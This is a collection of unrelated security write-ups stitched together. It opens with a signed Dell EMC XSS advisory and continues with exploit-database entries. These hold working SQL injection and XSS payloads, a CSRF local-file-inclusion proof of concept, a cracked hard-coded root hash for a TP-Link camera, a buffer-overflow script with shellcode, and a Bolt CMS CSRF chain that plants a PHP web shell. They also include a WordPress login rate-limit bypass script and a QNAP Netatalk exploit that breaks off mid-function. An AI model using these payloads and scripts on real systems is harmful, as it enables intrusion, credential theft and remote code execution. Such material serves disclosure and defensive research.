-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Dell EMC Product Taxonomy      IsilonSD Management Server

Role      Security Advisory Technically Signed Off by
Product Management    John Harr
Engineering Team           Phillip Nordwall
Program Management  David Geijsbeek
Service Product Lead (SDS)          Jeremy Johnson

DSA-2019-031: Dell EMC IsilonSD Management Server Cross-Site Scripting (XSS) Vulnerabilities

Dell EMC Identifier: DSA-2019-031
CVE Identifier: CVE-2019-3708, CVE-2019-3709
Severity: High
Severity Rating: Please refer to the Details section below of individual CVSS Scores for each CVE.

Affected products:
Dell EMC IsilonSD Management Server 1.1.0

Summary:
Dell EMC IsilonSD Management Server 1.1.1 contains fixes for two cross-site scripting (XSS) security vulnerabilities, which could potentially be exploited by malicious users to compromise the affected system.

Details:
Dell EMC IsilonSD Management Server 1.1.1 has been updated for the following XSS vulnerabilities:

*            Cross-Site Scripting Vulnerability in OVA file upload feature (CVE-2019-3708):
IsilonSD Management Server 1.1.0 contains a cross-site scripting vulnerability while uploading an OVA file. A remote attacker can trick an admin user to potentially exploit this vulnerability to execute malicious HTML or JavaScript code in the context of the admin user.
CVSS v3 Base Score: 8.3 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)

*            Cross-Site Scripting Vulnerability while registering vCenter servers (CVE-2019-3709):
IsilonSD Management Server 1.1.0 contains a cross-site scripting vulnerability while registering vCenter servers. A remote attacker can trick an admin user to potentially exploit this vulnerability to execute malicious HTML or JavaScript code in the context of the admin user.
CVSS v3 Base Score: 8.3 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H)


Resolution:
The following Dell EMC IsilonSD Management Server release contains resolutions to these vulnerabilities:
*            Dell EMC IsilonSD Management Server 1.1.1

Dell EMC recommends all customers upgrade at the earliest opportunity.

Link to remedies:

Customers can download software from
https://download.emc.com/downloads/DL93395_IsilonSD-Management-Server-1.1.1%C2%A0upgrade-package.rpm?source=OLS
https://download.emc.com/downloads/DL93394_IsilonSD-Management-Server-1.1.1-installation-package.ova?source=OLS



Credit:
Dell EMC would like to thank Jarrod Farncomb for reporting these vulnerabilities.
Severity Rating
For an explanation of Severity Ratings, refer to Dell EMC Knowledgebase article 468307 (https://support.emc.com/kb/468307). Dell EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.
Legal Information
Read and use the information in this Dell EMC Security Advisory to assist in avoiding any situation that might arise from the problems described herein. If you have any questions regarding this advisory, contact Dell EMC Technical Support (https://support.emc.com/servicecenter/contactEMC/). Dell EMC distributes Dell EMC Security Advisories, in order to bring to the attention of users of the affected Dell EMC products, important security information. Dell EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. Dell EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event, shall Dell EMC or its suppliers, be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of bus
 iness profits or special damages, even if Dell EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEP5nobPoCj3pTvhAZgSlofD2Yi6cFAlymVvsACgkQgSlofD2Y
i6f5shAAhZ2kxDHP55er+ec7pF3wJDKGc0Ie37NbnATEcWa/X03j7PCagOL6bOkf
vee3UQOaYe82atavCsJr6gOd7dq089UQuopObZB4ZXDvi3P62nOUUPCgZHw73rCw
LXpSn5RclwYTzMcl1OZaT87XrHAAOvrLlPKnACmFcMdja8aYdp2ILJghMIOPP7Ey
pNV4kJJt8Jbf7UDbBtKyENStEjHCbrf0Tuy74akPFNZ/GCZ6iRLfNF0k1nvyyQS2
tTWNkyepzLDgBJ1TC1DWq2WnMbPzg56us5SZc2dR8NI09IkNRlA4TyW2NOShpnJz
LRAvWO962ClzrA/dPAKOWTfjS6Y8Dur3stnPiHXGVe+aAdXQmfkN2WzJI6iQ00R5
oPnts3RyZZJ+kZZgjjgh7ntlmp5ZNV15R1mgLfhcjZzdccq/oUImbZkI1TBHSARE
i+ZP7w7rTxpYDPGXE4jQgAOh84NRc+sQrzZMTIOgA5EKDjrIMFPZHBWk6EryZnQW
/MQywAXy8Dg8H+Mj2iVil0c9/4rmHZLinAQTsXY1fBh/uixJYFo83khAdcla1fSi
mvRF14XkDAPOUq1CoiMu/WQucnY45F0BhOFVwmPt/8LoWMdwBpEmRf40Z0u9ZAM1
4246xtcPdSVAXetSYDfp3ATvM0lHiXryoVdEZwy0mem1fb8nv4w=
=BOEB
-----END PGP SIGNATURE-----

# Title: Form Maker by WD [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/form-maker
# Version: 1.13.2
# Tested on: WordPress 5.1

Description
-----------

Plugin implements the following AJAX actions:

- `generete_csv`
- `generete_xml`
- `formmakerwdcaptcha`
- `formmakerwdmathcaptcha`
- `product_option`
- `FormMakerEditCountryinPopup`
- `FormMakerMapEditinPopup`
- `FormMakerIpinfoinPopup`
- `show_matrix`
- `FormMakerSubmits`
- `FormMakerSQLMapping`
- `select_data_from_db`
- `manage_fm`
- `FMShortocde`

All of them call the function `form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.

Plugin also registers the following AJAX actions:

- `paypal_info`
- `checkpaypal`

Those seems like the are only available to PRO version users, yet they
also are vulnerable to this attack.

Additionally the following AJAX actions are registered in PRO version:

- `get_frontend_stats`
- `frontend_show_map`
- `frontend_show_matrix`
- `frontend_paypal_info`
- `frontend_generate_csv`
- `frontend_generate_xml`

Those have the function `form_maker_ajax_frontend` as a callback. All of
them are vulnerable to the aforementioned attack. What's more
interesting about those is the fact that are available to non-registered
users also, making this attack directly exploitable, without using a
CSRF attack. In this case the vulnerable param is `$_REQUEST['page']`.

PoC
---

### Using a CSRF attack

```html
<form method="post"
action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php?action=/../../../../../index">
<label>AJAX action:
<select name="action">
<optgroup label="Free version">
<option value="generete_csv">generete_csv</option>
<option value="generete_xml">generete_xml</option>
<option
value="formmakerwdcaptcha">formmakerwdcaptcha</option>
<option
value="formmakerwdmathcaptcha">formmakerwdmathcaptcha</option>
<option value="product_option">product_option</option>
<option
value="FormMakerEditCountryinPopup">FormMakerEditCountryinPopup</option>
<option
value="FormMakerMapEditinPopup">FormMakerMapEditinPopup</option>
<option
value="FormMakerIpinfoinPopup">FormMakerIpinfoinPopup</option>
<option value="show_matrix">show_matrix</option>
<option value="FormMakerSubmits">FormMakerSubmits</option>
<option
value="FormMakerSQLMapping">FormMakerSQLMapping</option>
<option
value="select_data_from_db">select_data_from_db</option>
<option value="manage_fm">manage_fm</option>
<option value="FMShortocde">FMShortocde</option>
</optgroup>
<optgroup label="Pro Version">
<option value="paypal_info">paypal_info</option>
<option value="checkpaypal">checkpaypal</option>
<option
value="get_frontend_stats">get_frontend_stats</option>
<option value="frontend_show_map">frontend_show_map</option>
<option
value="frontend_show_matrix">frontend_show_matrix</option>
<option
value="frontend_paypal_info">frontend_paypal_info</option>
<option
value="frontend_generate_csv">frontend_generate_csv</option>
<option
value="frontend_generate_xml">frontend_generate_xml</option>
</optgroup>
</select>
</label>
<button type="submit" value="Submit">Submit</button>
</form>
```

### Without leveraging the CSRF vulnerability

```sh
curl 'http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php' \
    -d 'action=get_frontend_stats&page=/../../../../../index'
```

*Summary:*

The NC450 is your favorable companion that meets to home and office
surveillance needs, keeping you in touch with what matters most. With its
smooth and durable Pan/Tilt of up to 300/110 degrees, you can turn the
camera to almost any position you want and watch over a wider area of your
home.

HD Pan/Tilt Wi-Fi Camera NC450 contain hard-coded credentials within its
Linux distribution image. This credentials (root:root) cannot be changed
through any normal operation of the camera.

*Vendor:*

TP-LINK Technologies Co., Ltd. - http://www.tp-link.us

*Affected Version:*

NC450 1.5.0 Build 181022 Rel.3A033D

*Vendor Status*

N/A

*Proof Of Concept:*

/home/oit/Desktop/Firmware/_NC450_1.5.0_Build_181022_Rel.3A033D.bin.extracted/jffs2-root
[oit@ubuntu] [10:34]
> grep -iRn "root:" .
Binary file ./fs_1/bin/pppd matches
./fs_1/etc/passwd:1:root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux
User,,,:/home/root:/bin/sh
./fs_1/etc/group:1:root:x:0:


root@kali:~# cat hash.me
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:/bin/sh
root@kali:~# john hash.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh

1 password hash cracked, 0 left

*Credit:*

Sachin Wagh (@tiger_tigerboy)

*Reference:*

https://www.tp-link.com/in/home-networking/cloud-camera/nc450/
https://www.tp-link.com/in/support/download/nc450/#Firmware

Best Regards,

*Sachin Wagh*
Security Researcher

# Title: Tradebox - CryptoCurrency Buy Sell and Trading
# Date: 04.04.2019
# Exploit Author: Abdullah Çelebi
# Vendor Homepage: https://www.bdtask.com
# Software Link: tradebox.bdtask.com/demo-v5.3/
# Version: 5.4
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
Tradebox – CryptoCurrency Buy Sell and Trading Software. Tradebox is for
the cryptocurrency trading and selling.even you can request for buy and
sell at a specific price. There have withdrawal and deposit option.

# Vulnerabilities:
# An attacker can access all data following an authorized user login using
the parameter.


# POC - SQLi :

# Parameter: symbol (POST)
# Request URL: http://localhost/backend/dashboard/home/monthly_deposit
#    Type : boolean-based blind
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND 8149=8149
AND 'PuLt'='PuLt

#    Type : time-based blind
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' OR (SELECT *
FROM (SELECT(SLEEP(5)))rBnp) AND 'wNyS'='wNyS

#    Type : error-based
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' AND (SELECT
5276 FROM(SELECT COUNT(*),CONCAT(0x7162707671,(SELECT
(ELT(5276=5276,1))),0x7171787171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CnKo'='CnKo

#    Type : generic union
csrf_test_name=53d7718e6ed975d198e33cfcad7def47&symbol=USD' UNION ALL
SELECT
NULL,CONCAT(0x7162707671,0x75664d4466634a4d505554424d6d6a577957506a51534d734c6e7551516f436f71444e77796f4a63,0x7171787171)--
Lzbq

# Exploit Title: NCrypted Jobgator - SQL Injection
# Date: 05.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.ncrypted.net/jobgator/
# Demo Site: https://demo.ncryptedprojects.com/jobgator/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/agents/Find-Jobs
Vulnerable Parameter: experience (POST)
Payload: btnsearch=Search&experience=1" OR NOT
4365=4365#&job_title=Mr.&location=1

# Exploit Title: Shoretel Connect Multiple Vulnerability
# Google Dork: inurl:/signin.php?ret=
# Date: 14/06/2017
# Author: Ramikan
# Vendor Homepage: https://www.shoretel.com/
# Software Link: https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview
# Version: Tested on 18.62.2000.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0 can be affected on other versions.
# Tested on: Mozila Firefox 53.0.3 (32 bit) Browser
# CVE :CVE-2019-9591, CVE-2019-9592, CVE-2019-9593
# Category:Web Apps


Vulnerability: Reflected XSS and Session Fixation
Vendor Web site: http://support.shoretel.com
Version tested:18.62.2000.0, Version 19.45.1602.0, 19.45.5101.0, 19.47.9000.0, 19.48.8400.0
Google dork: inurl:/signin.php?ret=
Solution: Update to 19.49.1500.0



Vulnerability 1:Refelected XSS & Form Action Hijacking

Affected URL:

/signin.php?ret=http%3A%2F%2Fdomainname.com%2F%3Fpage%3DACCOUNT&&brand=4429769&brandUrl=https://domainname.com/site/l8o5g--><script>alert(1)</script>y0gpy&page=ACCOUNT

Affected Parameter: brandUrl


Vulnerability 2: Reflected XSS

Affected URL:

/index.php/" onmouseover%3dalert(document.cookie) style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b

Affected Parameter: url
Affected Version 19.45.1602.0


Vulnerability 3: Reflected XSS

/site/?page=jtqv8"><script>alert(1)</script>bi14e

Affected Parameter: page
Affected Version:18.82.2000.0

GET /site/?page=jtqv8"><script>alert(1)</script>bi14e HTTP/1.1
Host: hostnamem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://bdrsconference.bdrs.com/signin.php
Cookie: PHPSESSID=2229e3450f16fcfb2531e2b9d01b9fec; chkcookie=1508247199505
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Vulnerability 4: Session Hijacking

By exploiting the above XSS vulnerability, the attacker can obtain the valid session cookies of a authenticated user and hijack the session.

PHPSESSID, chkcookie both cookies are insecure.

#!/usr/bin/python -w

#
# Exploit Author: Chris Au
# Exploit Title:  FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode)
# Date: 06-04-2019
# Vulnerable Software: FlexHEX 2.71
# Vendor Homepage: http://www.flexhex.com
# Version: 2.71
# Software Link: http://www.flexhex.com/download/flexhex_setup.exe
# Tested Windows Windows XP SP3
#
#
# PoC
# 1. generate evil.txt, copy contents to clipboard
# 2. open FlexHEX Editor
# 3. select "Stream", click "New Stream..."
# 4. paste contents from clipboard in the "Stream Name:"
# 5. select OK
# 6. calc.exe
#

filename="evil.txt"
junk = "\xcc" * 276
nseh = "\x90\x45"
seh = "\xd5\x52" #pop pop retn
valign = (
"\x45" #align
"\x56" #push esi
"\x45" #align
"\x58" #pop eax
"\x45" #align
"\x05\x20\x11" #add eax,11002000
"\x45" #align
"\x2d\x1a\x11" #sub eax,11001a00
"\x45" #align
"\x50" #push eax
"\x45" #align
"\xc3" #retn
)
#nop to shell
nop = "\x45" * 94
#call calc.exe, bufferRegister=EAX
shellcode = (
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
"AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
"JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
"npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
"foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
"kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
"9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
"zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
"kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
"iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
"Lnc51hOuipAA")
fill = "\x45" * 5000
buffer = junk + nseh + seh + valign + nop + shellcode + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
      function exploit() {

        var target = "http://127.0.0.1"

        var bolt_admin_url = target + "/bolt";

        var xhr = new XMLHttpRequest();
        xhr.open("POST", bolt_admin_url + "/upload", true);
        xhr.setRequestHeader("Accept", "application\/json, text\/javascript, *\/*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------130713229751679908527494159");
        xhr.withCredentials = true;
        var body = "-----------------------------130713229751679908527494159\r\n" + 
"Content-Disposition: form-data; name=\"files[]\"; filename=\"stager.html\"\r\n" + 
"Content-Type: text/plain\r\n" + 
"\r\n" + 
"\x3cscript\x3e\r\n" + 
"\r\n" + 
"function exploit(){\r\n" + 
"\r\n" + 
"        var bolt_admin_url = \""+bolt_admin_url+"\";\r\n" + 
"\r\n" + 
"        var xhr = new XMLHttpRequest();\r\n" + 
"        \r\n" + 
"        if(xhr) {\r\n" + 
"            xhr.open(\'GET\', bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + 
"            xhr.onreadystatechange = handler;\r\n" + 
"            xhr.send();\r\n" + 
"        }\r\n" + 
"\r\n" + 
"        function handler(){\r\n" + 
"          if (xhr.readyState == 4 && xhr.status == 200) {\r\n" + 
"                user_page = document.createElement(\'html\');\r\n" + 
"                user_page.innerHTML = xhr.responseText;\r\n" + 
"                token_input = (user_page.getElementsByTagName(\'input\')[0]).value;\r\n" + 
"                console.log(\"Token obtained:\" + token_input);\r\n" + 
"                ModifyAllowedExtensions(token_input);\r\n" + 
"                UploadShell();\r\n" + 
"          }\r\n" + 
"        }\r\n" + 
"\r\n" + 
"        function ModifyAllowedExtensions(token) {\r\n" + 
"\r\n" + 
"            var xhr = new XMLHttpRequest();\r\n" + 
"            xhr.open(\"POST\", bolt_admin_url + \"/file/edit/config/config.yml\", true);\r\n" + 
"            xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + 
"            xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + 
"            xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\r\n" + 
"            xhr.withCredentials = true;\r\n" + 
"            var body = \"file_edit%5B_token%5D=\"+token+\"&file_edit%5Bcontents%5D=%23+Database+setup.+The+driver+can+be+either+\\\'sqlite\\\'%2C+\\\'mysql\\\'+or+\\\'postgres\\\'.%0D%0A%23%0D%0A%23+For+SQLite%2C+only+the+databasename+is+required.+However%2C+MySQL+and+PostgreSQL%0D%0A%23+also+require+\\\'username\\\'%2C+\\\'password\\\'%2C+and+optionally+\\\'host\\\'+(+and+\\\'port\\\'+)+if+the+database%0D%0A%23+server+is+not+on+the+same+host+as+the+web+server.%0D%0A%23%0D%0A%23+If+you\\\'re+trying+out+Bolt%2C+just+keep+it+set+to+SQLite+for+now.%0D%0Adatabase%3A%0D%0A++++driver%3A+sqlite%0D%0A++++databasename%3A+bolt%0D%0A%0D%0A%23+The+name+of+the+website%0D%0Asitename%3A+A+sample+site%0D%0Apayoff%3A+The+amazing+payoff+goes+here%0D%0A%0D%0A%23+The+theme+to+use.%0D%0A%23%0D%0A%23+Don\\\'t+edit+the+provided+templates+directly%2C+because+they+_will_+get+updated%0D%0A%23+in+next+releases.+If+you+wish+to+modify+a+default+theme%2C+copy+its+folder%2C+and%0D%0A%23+change+the+name+here+accordingly.%0D%0Atheme%3A+base-2018%0D%0A%0D%0A%23+The+locale+that\\\'ll+be+used+by+the+application.+If+no+locale+is+set+the%0D%0A%23+fallback+locale+is+\\\'en_GB\\\'.+For+available+options%2C+see%3A%0D%0A%23+https%3A%2F%2Fdocs.bolt.cm%2Fother%2Flocales%0D%0A%23%0D%0A%23+In+some+cases+it+may+be+needed+to+specify+(non-standard)+variations+of+the%0D%0A%23+locale+to+get+everything+to+work+as+desired.%0D%0A%23%0D%0A%23+This+can+be+done+as+%5Bnl_NL%2C+Dutch_Netherlands%5D+when+specifying+multiple%0D%0A%23+locales%2C+ensure+the+first+is+a+standard+locale.%0D%0Alocale%3A+en_GB%0D%0A%0D%0A%23+Set+the+timezone+to+be+used+on+the+website.+For+a+list+of+valid+timezone%0D%0A%23+settings%2C+see%3A+http%3A%2F%2Fphp.net%2Fmanual%2Fen%2Ftimezones.php%0D%0A%23+timezone%3A+UTC%0D%0A%0D%0A%23+Set+maintenance+mode+on+or+off.%0D%0A%23%0D%0A%23+While+in+maintenance+mode%2C+only+users+of+level+editor+or+higher+can+access+the%0D%0A%23+site.%0D%0A%23%0D%0A%23+All+other+visitors+are+presented+with+a+notice+that+the+site+is+currently%0D%0A%23+offline.%0D%0A%23%0D%0A%23+The+default+template+file+can+be+found+in+%2Fapp%2Ftheme_defaults%2F+and+overridden%0D%0A%23+with+this+option+using+your+own+theme.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on+the%0D%0A%23+++++++website%2C+be+sure+to+check+for+a+config.yml+file+in+your+theme\\\'s+folder.%0D%0A%23+++++++If+a+template+is+set+there%2C+it+will+override+the+setting+here.%0D%0Amaintenance_mode%3A+false%0D%0Amaintenance_template%3A+maintenance_default.twig%0D%0A%0D%0A%23+The+hour+of+the+day+for+the+internal+cron+task+scheduler+to+run+daily%2C+weekly%2C%0D%0A%23+monthly+and+yearly+jobs.%0D%0A%23%0D%0A%23+Default%3A+3+(3+am)%0D%0Acron_hour%3A+3%0D%0A%0D%0A%23+If+your+site+is+reachable+under+different+urls+(say%2C+both+blog.example.org%2F%0D%0A%23+as+well+as+example.org%2F)%2C+it\\\'s+a+good+idea+to+set+one+of+these+as+the%0D%0A%23+canonical%2C+so+it\\\'s+clear+which+is+the+primary+address+of+the+site.%0D%0A%23%0D%0A%23+If+you+include+%60https%3A%2F%2F%60%2C+it+will+be+included+in+the+canonical+urls.%0D%0A%23canonical%3A+example.org%0D%0A%0D%0A%23+Bolt+can+insert+a+%3Clink+rel%3D%22shortcut+icon%22%3E+for+all+pages+on+the+site.%0D%0A%0D%0A%23+Note%3A+The+location+given+is+relative+to+the+currently+selected+theme.+If%0D%0A%23+++++++you+want+to+set+the+icon+yourself%2C+just+don\\\'t+enable+the+following+line.%0D%0A%23favicon%3A+images%2Ffavicon-bolt.ico%0D%0A%0D%0A%23+The+default+content+to+use+for+the+homepage%2C+and+the+template+to+render+it%0D%0A%23+with.+This+can+either+be+a+specific+record+(like+%60page%2F1%60)+or+a+listing+of%0D%0A%23+records+(like+%60entries%60).+In+the+chosen+\\\'homepage_template\\\'%2C+you+will+have%0D%0A%23+%60record%60+or+%60records%60+at+your+disposal%2C+depending+on+the+\\\'homepage\\\'+setting.%0D%0A%23%0D%0A%23+Note%3A+If+you\\\'ve+changed+the+filename%2C+and+your+changes+do+not+show+up+on%0D%0A%23+++++++the+website%2C+be+sure+to+check+for+a+theme.yml+file+in+your+theme\\\'s%0D%0A%23+++++++folder.+If+a+template+is+set+there%2C+it+will+overri
"            var aBody = new Uint8Array(body.length);\r\n" + 
"            for (var i = 0; i \x3c aBody.length; i++)\r\n" + 
"              aBody[i] = body.charCodeAt(i); \r\n" + 
"            xhr.send(new Blob([aBody]));\r\n" + 
"        }\r\n" + 
"\r\n" + 
"        function UploadShell() {\r\n" + 
"            var xhr = new XMLHttpRequest();\r\n" + 
"            xhr.open(\"POST\", bolt_admin_url + \"/upload\", true);\r\n" + 
"            xhr.setRequestHeader(\"Accept\", \"application\\/json, text\\/javascript, *\\/*; q=0.01\");\r\n" + 
"            xhr.setRequestHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\r\n" + 
"            xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------130713229751679908527494159\");\r\n" + 
"            xhr.withCredentials = true;\r\n" + 
"            var body = \"-----------------------------130713229751679908527494159\\r\\n\" + \r\n" + 
"              \"Content-Disposition: form-data; name=\\\"files[]\\\"; filename=\\\"shell.php\\\"\\r\\n\" + \r\n" + 
"              \"Content-Type: text/plain\\r\\n\" + \r\n" + 
"              \"\\r\\n\" + \r\n" + 
"              \"\\x3c?php echo(system($_GET[\\\'cmd\\\'])); ?\\x3e\\n\" + \r\n" + 
"              \"\\r\\n\" + \r\n" + 
"              \"-----------------------------130713229751679908527494159--\\r\\n\";\r\n" + 
"            var aBody = new Uint8Array(body.length);\r\n" + 
"            for (var i = 0; i \x3c aBody.length; i++)\r\n" + 
"              aBody[i] = body.charCodeAt(i); \r\n" + 
"            xhr.send(new Blob([aBody]));\r\n" + 
"        }\r\n" + 
"    }\r\n" + 
"\r\n" + 
"    exploit();\r\n" + 
"\r\n" + 
"\x3c/script\x3e\r\n" + 
"\n" + 
"\r\n" + 
"-----------------------------130713229751679908527494159--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));

        setTimeout(function() {
            var dateObj = new Date();
            var folder = dateObj.getFullYear() + "-" + (String("00"+(dateObj.getMonth()+1)).slice(-2));
            document.getElementById('stager').src = target + "/files/"+folder+"/stager.html";
            console.log("Called stager! Wait a moment and access: " + target + "/files/" + folder + "/shell.php?cmd=whoami");
         }, 2000);

      }

      window.onload = function() {
        exploit();
      };

</script>
<iframe id="stager" style="width:0;height:0;border:0;border:none" src=""></iframe>
</body>
</html>

#!/usr/bin/env node
const request = require("request")

/**
 * Exploit Title: Limit Login Attempts Reloaded by WPChef rate limiter bypass
 * Date: 2019-04-08
 * Exploit Author: isdampe
 * Software Link: https://wordpress.org/plugins/limit-login-attempts-reloaded
 * Version: 2.7.4
 * Tested on: WordPress 5.1.1
 *
 * Description
 * -----------
 *
 *  The plugin's primary goal is to limit the rate at which an individual can attempt
 *  to authenticate with WordPress. Plugin has support for HTTP headers 
 *  X_FORWARDED_FOR and X_SUCURI_CLIENTIP to allow rate limiting for users
 *  when web servers are behind a reverse proxy service.
 *  However, REMOTE_ADDR is not verified as a whitelisted proxy address, thus
 *  allowing an attacker to easily forge either the X_FORWARDED_FOR or 
 *  X_SUCURI_CLIENTIP headers to completely bypass the rate limiting service.
 *
 *  PoC
 *  ---
 */
class LoginRequest
{
  constructor(loginUri, numberOfRepititions) {
    this._loginUri = loginUri
    this._numberOfRepititions = numberOfRepititions
    this._count = 0
  }

  async process() {
    await this._sendRequest()
    if (this._count++ < this._numberOfRepititions)
      this.process()
  }

  async _sendRequest() {
    return new Promise(async (resolve, reject) => {
      console.log(`Sending request ${this._count}...`)

      request.post({
        url : this._loginUri,
        form: {
"log": this._getRandomString(),
"pwd": this._getRandomString(),
"wp-submit": "Log+In",
"redirect_to": "/wp-admin/",
"testcookie": "1"
        },
        headers: {
"X_FORWARDED_FOR": this._getRandomIp()
        }
      }, (err, res, body) => {
        if (err)
          console.error(err)

        if (body.indexOf("Too many failed") > -1) {
          reject("Login was rejected, exploit failed.")
          return
        }

        resolve()
        console.log(`\tRequest ${this._count} was not blocked`)
      })

    })
  }

  _getRandomString() {
    const map = "abcdefghijklmnopqrstuvwxyz0123456789"
    const length = Math.floor(Math.random() * 15) + 1
    let buffer = ""
    for (let i=0; i<length; ++i)
      buffer += Math.floor(Math.random() * map.length)

    return buffer
  }

  _getRandomIp() {
    const bits = []
    for (let x=0; x<4; ++x)
      bits.push(Math.floor(Math.random() * 254)) + 1
    return bits.join(".")
  }

}

if (process.argv.length < 4) {
  console.log("Usage: ./bypass-ip-block.js [url] [number_of_repititions]")
  console.log("\turl:                     The url pointing to wp-login.php, (e.g. http://localhost/wp-login.php)")
  console.log("\tnumber_of_repititions:   The number of login attempts to create (e.g. 500)")
  process.exit(1)
}

const session = new LoginRequest(process.argv[2], process.argv[3])
session.process()

##
# Exploit Title: QNAP Netatalk Authentication Bypass
# Date: 12/20/2018
# Original Exploit Author: Jacob Baines
# Modifications for QNAP devices: Mati Aharoni
# Vendor Homepage: http://netatalk.sourceforge.net/
# Software Link: https://sourceforge.net/projects/netatalk/files/
# Version: Before 3.1.12
# CVE : CVE-2018-1160
# Advisory: https://www.tenable.com/security/research/tra-2018-48
# Tested on latest firmware as of Feb 1st 2019:   
#  QNAP TS-X85U (TS-X85U_20181228-4.3.6.0805)
#  QNAP TS-X73U (TS-X73U_20181228-4.3.6.0805)
#  QNAP TS-X77U (TS-X77U_20181228-4.3.6.0805)
#  QNAP TS-X88  (TS-X88_20190119-4.4.0.0820)
##
import argparse
import socket
import struct
import sys

# Known addresses:
# This exploit was written against a Netatalk compiled for a
# QNAP TS-1273-RP and possibly works on other models. 
# The addresses below may need be changed for different QNAP targets.

preauth_switch_base = '\x80\xf5\x64\x00\x00\x00\x00\x00' # 0x64f580
afp_getsrvrparms = '\xd3\xa3\x43\x00\x00\x00\x00\x00' # 0x43a3d3
afp_openvol = '\xc2\xab\x43\x00\x00\x00\x00\x00'  # 0x43abc2
afp_enumerate_ext2 = '\x49\xf8\x41\x00\x00\x00\x00\x00' # 0x41f849
afp_openfork = '\xa3\xa5\x42\x00\x00\x00\x00\x00' # 0x42a5a3
afp_read_ext = '\x4b\xc1\x42\x00\x00\x00\x00\x00' # 0x42c14b
afp_createfile = '\x10\x40\x42\x00\x00\x00\x00\x00' # 0x424010
afp_write_ext = '\x9f\xd1\x42\x00\x00\x00\x00\x00' # 0x42d19f
afp_delete = '\x1e\x93\x42\x00\x00\x00\x00\x00' # 0x42931e

##
# This is the actual exploit. Overwrites the commands pointer
# with the base of the preauth_switch
##
def do_exploit(sock):
  print "[+] Sending exploit to overwrite preauth_switch data."
  data = '\x00\x04\x00\x01\x00\x00\x00\x00'
  data += '\x00\x00\x00\x1a\x00\x00\x00\x00'
  data += '\x01' # attnquant in open sess
  data += '\x18' # attnquant size
  data += '\xad\xaa\xaa\xba' # overwrites attn_quantum (on purpose)
